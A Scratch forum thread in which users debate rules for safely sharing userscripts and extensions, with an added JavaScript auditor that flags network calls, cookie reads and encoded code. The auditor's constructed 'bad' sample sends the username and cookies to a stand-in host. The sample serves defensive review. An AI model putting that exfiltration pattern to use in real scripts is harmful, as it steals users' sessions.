infinitytec
Scratcher
1000+ posts

Extensions/Userscripts: Is there a fair compromise?

As many of you know, the ST now does not allow sharing and promoting browser extensions and userscripts on the Scratch website. Many are upset about this change, as it is definitely less enjoyable to make additional features to customize the way the site works. However, the Scratch Team has a valid reason for restricting them:

ceebee wrote:

Browser-based extensions and userscripts can be risky because they can get access to everything you do online. This means that they could potentially get information about the websites you visit, collect private information about you, and change what you see in ways you don’t expect. In the past, we have allowed these to be advertised on Scratch because they can also be fun, safe, and helpful tools – and because we’ve seen that Scratchers can learn a lot by making them. But we feel the risks and potential harm outweigh these benefits.

Can we find a middle ground? Some way to ensure extensions and userscripts are safe for everyone to use?

Please discuss. I hope we will be able to find a way around this disagreement.
Scratch team: please join in the conversation. If we are able to make everyone happy with a compromise, we will need your support.

Here are some ideas:

infinitytec wrote:

  • The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot be advertised. Links to it shall be removed.
  • Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
  • No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
  • Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
  • Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
  • Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.

PullJosh wrote:

  • Don't share scripts that result in any sharing of user data, even if it's opt-in. Many users – especially younger Scratchers – aren't aware of the full implications of safety decisions that they make, and could end up doing something that they don't mean to.
  • Always make the source code for anything you share easily available. (This means no scripts that require a server/backend to run!) Everybody who wants the script should have easy access to every line of code involved, and should be encouraged to read it and look out for anything that would be of concern to them. Forum users should also check each other's scripts when possible to spot any security issues (intentional or not).
  • Always, always, always respect what the ST says. They're doing difficult but important work running this site, and it's our job to make their lives easy.

NitroCipher wrote:

  • Does not link to dangerous websites
  • Follows community guidelines
  • Submission request must include proper grammar and punctuation
  • Discussion
Note: I have removed some duplicate ideas.


Please note: I am not promoting the use of a userscript or extension. I just want to see if there is a way to make everyone happy.

Last edited by infinitytec (Dec. 22, 2017 00:00:39)
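The "open source", "local resources only" and "no collecting and sharing of user data" rules above are checkable, at least in a first pass. What follows is an added example, not code from this thread or from the Scratch Team: a small static triage script that scans a userscript's source for the things a reviewer would want to look at before vouching for it (a site-wide `@match`/`@include`, `@connect` or `GM_xmlhttpRequest` grants, network APIs, cookie or storage access, dynamic/encoded code, and absolute URLs pointing off the site). The trusted host, the rule list and the two sample scripts are constructed for illustration; `example.invalid` is a reserved name, not a real server.

```javascript
// Added example (not from the thread): static triage of a userscript against the
// "local resources only / no backend / no data collection" rules proposed above.
// An empty result means "nothing obvious", not "safe": string matching is easy to
// evade (e.g. window["fe" + "tch"]), so a human still has to read the whole script.

const TRUSTED_HOSTS = ["scratch.mit.edu"]; // assumption: the site the script customises

// Each rule is a regex over the script body plus the reason a reviewer cares.
const RULES = [
  { id: "fetch",        re: /\bfetch\s*\(/,                          why: "can send data to a server" },
  { id: "xhr",          re: /\bXMLHttpRequest\b/,                    why: "can send data to a server" },
  { id: "beacon",       re: /\bnavigator\.sendBeacon\s*\(/,          why: "can send data even on page unload" },
  { id: "websocket",    re: /\b(WebSocket|EventSource)\s*\(/,        why: "opens a persistent connection" },
  { id: "gm_xhr",       re: /\bGM[_.]xmlHttpRequest\b/i,             why: "cross-origin request via the userscript manager" },
  { id: "cookie",       re: /\bdocument\.cookie\b/,                  why: "reads the session cookie" },
  { id: "storage",      re: /\b(localStorage|sessionStorage)\b/,     why: "reads or writes persisted data" },
  { id: "dynamic_code", re: /\b(eval|Function)\s*\(|\batob\s*\(/,    why: "dynamic or encoded code hides intent from review" },
];

const META_BLOCK = /\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/;

// Parse the Greasemonkey/Tampermonkey metadata block into { key: [values...] }.
function parseMetadata(source) {
  const meta = {};
  const block = source.match(META_BLOCK);
  if (!block) return meta;
  for (const line of block[1].split("\n")) {
    const m = line.match(/^\s*\/\/\s*@(\w+)\s+(.+?)\s*$/);
    if (m) (meta[m[1]] = meta[m[1]] || []).push(m[2]);
  }
  return meta;
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; }
}

// Returns a list of { id, detail, why } findings for a reviewer to follow up.
function auditUserscript(source) {
  const findings = [];
  const meta = parseMetadata(source);
  const body = source.replace(META_BLOCK, ""); // metadata is checked separately below

  // A script that runs on every site gets everything you do online.
  for (const pattern of [...(meta.match || []), ...(meta.include || [])]) {
    if (!TRUSTED_HOSTS.some((h) => pattern.includes(h))) {
      findings.push({ id: "scope", detail: pattern, why: "runs outside the site it claims to customise" });
    }
  }
  // @connect and a GM_xmlhttpRequest grant are explicit requests for network egress.
  for (const host of meta.connect || []) {
    findings.push({ id: "connect", detail: host, why: "declares a server it will talk to" });
  }
  for (const grant of meta.grant || []) {
    if (/GM[_.]xmlHttpRequest/i.test(grant)) {
      findings.push({ id: "gm_xhr", detail: grant, why: "cross-origin request via the userscript manager" });
    }
  }
  for (const rule of RULES) {
    const m = body.match(rule.re);
    if (m) findings.push({ id: rule.id, detail: m[0], why: rule.why });
  }
  // Any absolute URL pointing off the trusted site is a potential exfiltration endpoint.
  for (const m of body.matchAll(/https?:\/\/[^\s"'`)]+/g)) {
    const host = hostOf(m[0]);
    if (host && !TRUSTED_HOSTS.includes(host)) {
      findings.push({ id: "external_url", detail: m[0], why: "references a server outside the site" });
    }
  }
  return findings;
}

// Constructed sample: a purely local UI tweak, like the "restore Discuss" script.
const GOOD_SCRIPT = `// ==UserScript==
// @name    Restore Discuss link
// @match   https://scratch.mit.edu/*
// @grant   none
// ==/UserScript==
(function () {
  var nav = document.querySelector("#topnav ul.site-nav, #navigation .inner>ul");
  if (!nav) return;
  var li = document.createElement("li");
  var a = li.appendChild(document.createElement("a"));
  a.setAttribute("href", "/discuss/");
  a.innerText = "Discuss";
  nav.insertBefore(li, nav.children[2]);
})();`;

// Constructed sample: looks like a theme, but runs everywhere and ships the
// logged-in username plus cookies to a third-party server.
const BAD_SCRIPT = `// ==UserScript==
// @name    Helpful theme
// @match   *://*/*
// @connect example.invalid
// @grant   GM_xmlhttpRequest
// ==/UserScript==
(function () {
  var el = document.querySelector(".user-name");
  var who = el ? el.textContent : "";
  fetch("https://example.invalid/collect?u=" + encodeURIComponent(who) + "&c=" + document.cookie);
})();`;
```

Run `auditUserscript(GOOD_SCRIPT)` and it returns nothing to follow up; `auditUserscript(BAD_SCRIPT)` returns the site-wide scope, the `@connect` host, the grant, the `fetch` call, the cookie read and the external URL. The checker is deliberately noisy rather than clever: it would also flag a legitimate `fetch` to Scratch's own API, and that is the point, because the rules above say the reviewer, not the script author, decides whether a given call is acceptable.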

PullJosh
Scratcher
1000+ posts

Personally, I've never been a big fan of set-in-stone rules. I don't think that a system of regulations will ever be able to cover every possible situation.

My Recommendation
Interpret the ST's comments in a way that makes sense, not word-for-word. To be clear, I am NOT recommending that you disregard what the ST says. What I AM recommending is that Scratchers take serious time to consider whether what they are developing and sharing is useful to other people without posing any potential threat, even to new and uninformed Scratchers. Honestly, as long as you use your noggin and do what's right, I don't think anybody will have an issue.

Some Examples
GOOD (imo)
When the discuss button was removed from the navigation bar, many users wanted it back. I see no harm in sharing a userscript such as this one which restores it:
// ==UserScript==
// @name        Restore the Discuss link
// @match       https://scratch.mit.edu/*
// @grant       none
// ==/UserScript==
// (The metadata header above is what lets a userscript manager install this;
//  @match is assumed to be the Scratch site.)
(function () {
  // Works on both the older (#topnav) and the newer (#navigation) header markup.
  var nav = document.querySelector("#topnav ul.site-nav, #navigation .inner>ul");
  if (!nav) return; // not a page with the navigation bar
  var discuss = document.createElement("li");
  var discuss_a = discuss.appendChild(document.createElement("a"));
  discuss_a.setAttribute("href", "/discuss/");
  discuss_a.innerText = "Discuss";
  if (nav.className === "site-nav") {
    nav.insertBefore(discuss, nav.children[2]);
  } else {
    discuss.className = "link discuss";
    nav.insertBefore(discuss, nav.querySelector("li.tips"));
  }
})();

BAD (imo)
Back in the day, some users and I created the Mega Scratch Userscript. I would say that this one is a little more dicey. I can personally attest to the safety of the userscript (as I played a role in developing it), but it's a large enough script that a person could hide something dangerous inside if they wanted to. (Obviously don't install MSU unless you're really confident in its safety. Not trying to hurt anybody or intentionally break the ST's mandates.) In all honesty, I would not recommend sharing a script like MSU again in the future. However, I would see less harm in sharing the same features that MSU included as their own individual userscripts which are simpler to read and easy to check for security and safety concerns.

BAD (in the opinion of the ST and myself)
isOnline was a decent idea, but it ended up with some real security concerns. isOnline, out of necessity, tracked a lot of information about users. The first was the exact times in which a user logged on. Already, this information could be used to determine roughly where a person lives (based on time zones.) Next, isOnline started tracking the relationships between Scratchers: who your friends are, and how often you interact with them. This was absolutely an invasion of the privacy of Scratchers and goes against the safe, open community space that the Scratch Team works hard to create.

Final Words
  • Don't share scripts that result in any sharing of user data, even if it's opt-in. Many users – especially younger Scratchers – aren't aware of the full implications of safety decisions that they make, and could end up doing something that they don't mean to.
  • Always make the source code for anything you share easily available. (This means no scripts that require a server/backend to run!) Everybody who wants the script should have easy access to every line of code involved, and should be encouraged to read it and look out for anything that would be of concern to them. Forum users should also check each other's scripts when possible to spot any security issues (intentional or not).
  • Always, always, always respect what the ST says. They're doing difficult but important work running this site, and it's our job to make their lives easy.
infinitytec
Scratcher
1000+ posts

PullJosh wrote:

-snip-
Good thoughts! The no-backbone rule I think would be helpful to apply.
bobbybee
Scratcher
1000+ posts

infinitytec wrote:

PullJosh wrote:

-snip-
Good thoughts! The no-backbone rule I think would be helpful to apply.
Now about auditing Scratch's source, hmm….
DeleteThisAcount
Scratcher
1000+ posts

Hmm, I have a problem with all of this.

I don't trust Scratch's security. SCRATCH TEAM, MAKE SCRATCH OPEN SOURCE NOWWWWWWWWWWW, or at least the 2.0 site. k the bub bye
PullJosh
Scratcher
1000+ posts

DeleteThisAcount wrote:

Hmm, I have a problem with all of this.

I don't trust Scratch's security. SCRATCH TEAM, MAKE SCRATCH OPEN SOURCE NOWWWWWWWWWWW, or at least the 2.0 site. k the bub bye
This doesn't seem like a particularly useful contribution. As I'm sure you're aware, Scratch 3.0 is fully open source, as well as a decent portion of the website's code.

Anyway, this topic is about extensions and userscripts, so let's focus on that.
infinitytec
Scratcher
1000+ posts

I updated the OP to have some ideas that people have had that can be implemented.

So this is what I think:
  • The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot be advertised. Links to it shall be removed.
  • Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
  • No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
  • Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
  • Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
  • Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.

Last edited by infinitytec (Dec. 21, 2017 04:30:26)

MathWizz
Scratcher
100+ posts

Reminds me of when I found two different bugs back when 2.0 was in alpha… Anyone's project could be overwritten by anyone, and non-sandboxed JavaScript extensions could be loaded into a project on the main Scratch website (not ScratchX.) Apparently the ST did not consider my way of revealing the issue by including a snippet of JavaScript in someone's project “good exploit disclosure practice.”

Last edited by MathWizz (Dec. 21, 2017 05:14:14)

Jonathan50
Scratcher
1000+ posts

PullJosh wrote:

As I'm sure you're aware, Scratch 3.0 is fully open source, as well as a decent portion of the website's code.
But not the backend

Last edited by Jonathan50 (Dec. 21, 2017 06:56:03)

PullJosh
Scratcher
1000+ posts

infinitytec wrote:

I updated the OP to have some ideas that people have had that can be implemented.
Looks great!

MathWizz wrote:

-snip-
Classy.
Jonathan50
Scratcher
1000+ posts

infinitytec wrote:

So this is what I think:
  • The Community Guidelines must be followed: if a userscript or extension violates the community guidelines, it cannot be advertised. Links to it shall be removed.
  • Userscripts and extensions must be open-source: that way the community and users can examine the code to determine its safety.
  • No collecting and sharing of user data: extensions and userscripts must not make any data available to anyone.
  • Local resources only: the userscript or extension must run completely on the user's computer. Servers are not to send or receive data with the userscript or extension. However, a server may be used to distribute the userscript or extension, as long as it is secure. For example: userscripts can be downloaded off of GitHub and extensions can be downloaded via the browser's official extension site.
  • Transparency: users should know exactly what the userscript or extension does. The extension or userscript should have a forum thread that adequately describes what it does. While the userscript or extension is available, the forum thread must be open so issues can be reported. On closing the thread, all download links will be removed. When advertising the userscript or extension, any links for it must point to that forum thread and not an external website.
  • Ultimately, the Scratch Team gets the final say. They can handle violations in the way that seems best based on the Community Guidelines and the userscript/extension security and distribution policy.
That seems fair, but I think the reason why the Scratch Team said “no advertising userscripts/extensions” is because they don't want to have to either investigate each of the hundreds of userscripts and extensions people share on Scratch or set up an approval thingy like they already have for Scratcher's personal websites.
NitroCipher
Scratcher
500+ posts

please link this to my quote https://scratch.mit.edu/discuss/topic/284391/